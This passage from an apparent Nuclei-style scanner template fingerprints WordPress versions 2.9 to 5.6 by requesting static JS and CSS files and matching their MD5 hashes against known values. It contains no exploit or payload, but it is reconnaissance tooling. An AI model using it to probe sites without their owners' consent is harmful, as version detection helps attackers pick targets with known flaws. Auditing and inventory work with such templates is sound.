dsl: - - "(\"a78dedde748a70dc816381eefe608b72\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"70c91757d9cbf18b992d6d42f463ff7f\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"4cc94e39247daee4a2000aa3503ff215\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"ac3c48115c0205965fc697211684458d\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"085c0f540b7b3e70c084e4070b5b1b63\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"4f5a03618073955d601159a6331ceaa6\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"27f796c850d855e7a672386faa79605f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/wordcount.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"6cbedf2a939d33d895dca7b7a41ce749\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"761f62febb42875b72bc681607e28c49\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"ef5f88e073dfcb14615a7037ebd14d5a\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"f3719a4599c7a08452fc41ade441733a\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"1f80397cdd7cb373f7b8bf278857fabb\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"f20f637e974b45fb265d1d442f2a96cf\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"6cd42d81392ca9a1275e5929b219cb3e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/plugins.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"8b7c6306e6af8cc0a9c0976463e72291\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"4e4cafec091c6f0f0b05f94b9bce2344\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"16c85d6dab8967f3ba89b82bfbd64b9c\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"5c33e1efc8af44769e3d823c939e08ab\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"dfa7cb95b973bebb10f975b2c1143880\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d68b321a54cbc9d93cb151250f4c551b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"b3a531b04ae8c7a60aa0844b668d2d3e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/compose.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"84a24df5fd7511a645e0cc57c571a25e\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"39c3ea51be78c24e6b576cd61f9cfc15\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"45a96c9d47bae98f108e64e2b2a66270\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"90a33c0e9b6ef96958972ca75e65f7bb\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"a302e6d75222f9aa699a02cf71f9d7b3\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"dce767e630974837137c498073100cc5\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"edc09213e8efe783bc66b3b0f7cc4e9c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/token-list.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"0d97e2a44480fb98f1b04861ae5afc6b\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"867f84b6f025f1123314735f577dc382\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"42ad764acc204932657d4a003ba53c9f\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"1a954120fc762886e2f75c39f83186c5\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"63fb45908530ce527b962cc621b05230\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"9961c5f25ac509cf7cb40e68468841e3\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"4a5239779fc4eca6d020f55604ab0c47\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/plugins.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"cf2c44c23fcccdac64b0f533764e7a57\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"6822b991e921f7b612c7f1561c8aecfe\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"82268e20e6668545503caccea9e48fe2\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"be44053c6cf3cf00096ca0f61d1054d2\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"733acdbecefa13189f9646eb0b7ea527\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"f09ad846838e615fd9a379d3ff329c3b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"01651f0a9c050441e177a705582f10ee\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/token-list.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"aa95d2cbba56cee9e4c478aae1b495c5\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"9cc3df074bb2ee5a0f3ce49aff4d493e\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"ba25522bb908454e432fcb29b1992578\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"94af1e6e3c4a621d920bd15056ecd6df\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"61fce867969f5649b390d339b8fcc48c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"fdff31d347d9aee423ea3a5b8f776b7b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"9d837b1c5a73f565fe3c241cfeb7dfcc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/escape-html.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"57fb61bedd534ef3dd8c47e40db28211\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"77e523fe8f66de596d646ebd6c3e8ca9\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"495df404bcf10126197c0d6635ca9a07\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"ed967d411b4d74de9d0d6a6f586c74d3\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"7b007fb74b92764d1fc06ae511e66d06\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"ebefa1eab8a9bc27cf54d72ab0bb6c6d\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"543fde0978b47e7bdae1acd97bf054bc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/deprecated.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"98bad6a83bd5da218b2d35691f497566\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"5de3b6d2f9eac464561dd8b54ed55cf7\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"762e5549e126269285769457c2bb3ddb\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"f1a701ab0a84540fc6bccca46aa242d2\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"18322782d09be581a034f3ab97243810\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"daad3a5aa907c98228160c9289660f55\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c964eebe5839814c08c3fb26d951ca26\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/dom-ready.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"b5c1330c5b03e42ea6bcfa6df3fac8c4\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"b7059c3d8234362ea1acdf250099a7a9\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"ef19702e3c41e2b060de992a2bd2dd66\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"8825521d390213ffb919cafb95ca64e7\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"edd45ba6b7e8ecd18d3928e188372a32\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"0e5f0f7ec50672e362cfe3d619df3963\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"dfdcb2b3ede87acb1c69f68cc4e0ad5b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/wordcount.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"baee04dfe8fe19a1395c4764b3090e94\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"84adf32df85853051c4b4ff443579381\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"ec3e571129e51f249ba65f8510707637\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"1fbda7deaa611689cc829b97827de193\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"826c22d037cd314617169491f20321b6\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"bc24959774d006d11d22d9c30fef277f\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"e1880d9750e3d4598129644286fb579b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/escape-html.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"3d16ddce4596d2becd5a1600a222ad0f\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"1ed6a1ab0cb9e680c7e22fcdf23fc038\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"47aeb04222c3631c12d89f92f555c640\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"23cd8626f3e0d2006526f4c71b2deae5\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"db931b70025bb3f46d853926909e3d0d\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"153e7aebcae5f3708ce08c5300b87af1\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"486125227a8a0f2489d8214ddfc7e933\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/editor/editor-styles.min.css" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"6d86ff0ca33033ac9a036e21f0b0ea9e\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"6d969457c228c76ad1f8ecc9fddbedf4\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"6e1baf257d970da5013b5c5f3340ef3e\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"4a98fa4de2c4af7e9ecfedfde88e80a1\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"1f30ad7edc4eb4beaf09a019f47f7e4f\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"7d3cd9c728b30fc554ac4c4eb7b9cda3\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"91db91761b326cc094a5a777078669d7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/editor/editor-styles-rtl.min.css" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"6d86ff0ca33033ac9a036e21f0b0ea9e\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"6d969457c228c76ad1f8ecc9fddbedf4\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"6e1baf257d970da5013b5c5f3340ef3e\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"4a98fa4de2c4af7e9ecfedfde88e80a1\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"e7cc458c8a91418a8907411c401d7639\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"9d08900a8ecb0ceea1b7ec671090a00d\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"98dfb074ec9260ec1db6560c43f3a3b6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-library/theme.min.css" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"bfa7dc8c1c5e86d37ba25252afe3602e\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"5ca26d4ea597b0f25b8477a5e344c89b\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"182ddba2abac4cdd9ffda9ac1e64e4b9\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"80145dc9e4908a34d14ca5a87d33c6d7\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"74f22f7553d243dff615e40cf7ec2230\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"9bd313fbce9688ed85c407ad4d0a7c13\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"fedc9311ebafd1704b6a71d3a5b3101a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-library/theme-rtl.min.css" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"6d0ba66f6e7fcfdcba9bdaeb1dcad3c0\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"093a87e5f49cc3e10411d9a87bb36eb3\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"bb8862f82ae8dcdf5282216377ef773a\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"3eeaac647e4cd06679739d9554c96c86\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"a7692be7a7705e33788f67cce7f39207\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"3440f48f66bc6f461f0dfc60d98e5842\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"3ca7c8161a0b2f04d28e77f93d790c0a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/url.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.2 - dsl: - - "(\"123a422f86b67054286b77b4e0ea5d02\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"4d6c78efb41747c864b4dc24c5c7f939\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"d4037f627561122928f7e7cc40f65f46\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"35acce22efd4f6d2f6f9475813822cd2\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"1d84b37530e4cc75fed81422d0f9b646\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"1f746ad199999bfaf7a396f2065f8e9c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"52d4b4d3bc9a76cc7cb1b424070fb4bc\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"6f0f4cf71f4117e4889c02103129be92\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/hooks.js" - matchers: - - type: dsl - name: 5.0 - 5.0.2 - dsl: - - "(\"0c02dc3d6405f21e0e7ecba519a64e58\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"d1495ca6445d4be01ea2c604ffad2c91\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"625c7a6a70d2656655dab6eb11d3bcab\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"23352b6c517082b20c00a8b7214f0b3b\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"6dff5d62e5015eb8cb03988ca4fcfeb0\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"c7a2e00fdaae21ee9c5481b3e56c095e\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"08b8807b992956f5597724f2e13784e1\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"74a454248e71b2fd42b694ddf167bfb8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/url.js" - matchers: - - type: dsl - name: 5.0 - 5.0.2 - dsl: - - "(\"c229754f4b3d48a28bd2b498a3888fd4\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"026d66222af818d4aab9a2059165b064\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"5afa4e8668c3aaa88a476e3165b7d70f\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"74be87956d50685416bcf70b16b57785\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"edc8ad80ceb6b53aaf28e6610da3ca5b\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"769b16ac7a8892fb251c9f6c48c43fc4\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"34238cd53e89196494b742144a34ba0a\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"f66560251f29ae02c2f93ea50a58e9e1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/hooks.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.2 - dsl: - - "(\"a2b646c038a4717d8b1b5aca69c9670e\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"372901e50eb2d47eb24cb57a62aaa7f2\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"4e18512bfeb2e32f419cd82da8bfb799\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"d9fd81f370f535bb10e54ea7c42ef099\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"843d3122e1c99ce1e77ba5e67ad29de3\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"37f5274faecba356e91142961b5c14ef\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"8646afb0a68683c9d04b87191415d34e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2464cde73ceddee1f4a34cf49c122b60\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/site-health.js" - matchers: - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"cfbfe6b77305e9f9d3e33fec6d32cb5f\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"37c6ab849b0abab3b2aec4f3f47f05a9\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"27504fbc4b0045d55cad6f3f2919d6b4\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"f803f97346bc19b891a2261dec8c48fc\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"dbc04a3e2f3db6cb48a8fb72f7ed5cec\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/site-health.min.js" - matchers: - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"496175569dcb05e5cb145c2b84abafc8\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"c999b140e1d7d2c45c7c70f6bbcb99e2\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"742d3d24998e12859938b2cc09176e2a\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"3d7752688d52db5e3cf0db77c35b9f2c\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"d47cf1b26ab79bd2b68f66c16fbc48d1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/priority-queue.min.js" - matchers: - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"ec4d6cdbbbcb33554355e37e60d780e4\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"517ae9e1dae4d245f2b071dad50bbb33\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"9f6335c2e10c8a11ec2f895cbd1b1af7\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"0b4c4c0dd3ccaa8f9fb79de4959a91fe\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"7c7f08d3d51daa67b5616c721d4ee200\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/priority-queue.js" - matchers: - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"14abf08e7d04fcb87075c1648604a5a9\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"9ec356d434b7a09e112bf1c086b7bfb4\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"9d389c12bf9e0f25d6324d2226ca785f\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"cddf31c844ff08b4db7cef406b0346a9\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"b91af19e9e2df7d57b61c24f0100abfe\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-base.js" - matchers: - - type: dsl - name: 4.7.4 - 4.8.15 - dsl: - - "(\"0cdc710a8f36181a0c701a3ce7e5997b\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"8cade945b4a89d043762f80bcaed87aa\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"272674ffd71d5383e454ba023edc570c\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"161a6177aa359e2bc78e839ad6ee8d51\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"a1e0ef60b56dc0d59f03ff150c319f2b\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"5dca30a4679d1aedaacebd16a4a1a0ff\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"99408cfe66225d657d6bfe59611e4237\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"678187f7f110f020dcb64a0bcd62c9b8\" == md5(body))" - - type: dsl - name: 3.8 - 3.9.33 - dsl: - - "(\"aa275db98d31c41c3ea6b0a701b8a892\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"62f799465f3922f79057f8c1e17f123f\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"f435c162b8ac5353e9b9f92de1882cf8\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"44c9ce1c5ef5e1516a8bcc08f42931a2\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"811878a3509b308b50bc004360e5eec7\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"6b9e78b6f87828a337c31e5f4d474795\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d62e95f2aa34f1627648655ace1a1cfc\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"4365654cc960b21fc7bc03d2ac311b02\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/image-edit.js" - matchers: - - type: dsl - name: 4.8 - 4.9.4 - dsl: - - "(\"c8bd51029ca05bb65b49f80025b5fc5c\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"16a3cb26cb0814a231d58b38c97df814\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"6c814dd18a8c2eaab9ecb52ac319a85c\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"646b0f05bb16169872ac68c1087c0a90\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"c21931f1eecd6c1532a4c2ca7a7faa5e\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"f4da63e5c9c6e64e67d9662965af69d8\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"5701a93d854686d6a6f26f64216fe14f\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"aa560e6d9e2c20598fe08dda9bad82b3\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"abee7dc06e6c318e85deb3db101b518a\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"f2e5873b4cc923135fef4ebb4991e0ef\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"8d71200d96c8b58ccf6f2bb3a249ed95\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"6edbe79ea0c3df5123d2667feb05a36f\" == md5(body))" - - type: dsl - name: 2.9 - 3.1.4 - dsl: - - "(\"42df1d1f6cd6db258307ed95b60b9168\" == md5(body))" - - type: dsl - name: 4.9.5 - 5.0.11 - dsl: - - "(\"b6c28ba4d4b1419cb5cf936cc277f0f2\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"288062dd616078315bcefc5f3813462c\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"d05e5dcd5ec0b6f3573c77da40f6004c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"f08b314e90861026d8db2654bf4ec6c6\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"b2f16bcb08802029cb7c4a3cc18c132c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/format-library/style-rtl.min.css" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"0e7d5e83a110cada2dcbb79e0ebb5cf5\" == md5(body))" - - type: dsl - name: 5.2 - 5.3.6 - dsl: - - "(\"cf8bddec90a1c79917947c459e8768ce\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"5fc495995010c25fdaa23948992ff3ba\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"967f85719949bb31b665e4759cdb5c65\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"d7873eea88f51925f7931278b66c383f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/format-library/style.min.css" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"0e7d5e83a110cada2dcbb79e0ebb5cf5\" == md5(body))" - - type: dsl - name: 5.2 - 5.3.6 - dsl: - - "(\"cf8bddec90a1c79917947c459e8768ce\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"f2902dc84667bd1b40b44b7640a460d0\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"b85c22e11453d8882434239e440bdf43\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"5624a5d450c4fc3b32a33bcc9e06fd83\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/tags-suggest.js" - matchers: - - type: dsl - name: 4.7.4 - 5.0.11 - dsl: - - "(\"e6b0ed85e26e70669c5715c7ad0f093e\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"8be7404f47238690d2661ef0c1b03481\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"fc09cd4b84504470a8169de1fbe1846a\" == md5(body))" - - type: dsl - name: 5.2 - 5.3.6 - dsl: - - "(\"1e0f50a2947ccda6a1f9afbc3563b1d5\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"d25ce9bfcd49f45ea2ce2639f63a9c3f\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"b7c4d1698941cc299ec1b81ec26a80a9\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"ab7f70969944f6ac429616610542932a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/warning.min.js" - matchers: - - type: dsl - name: 5.4 - 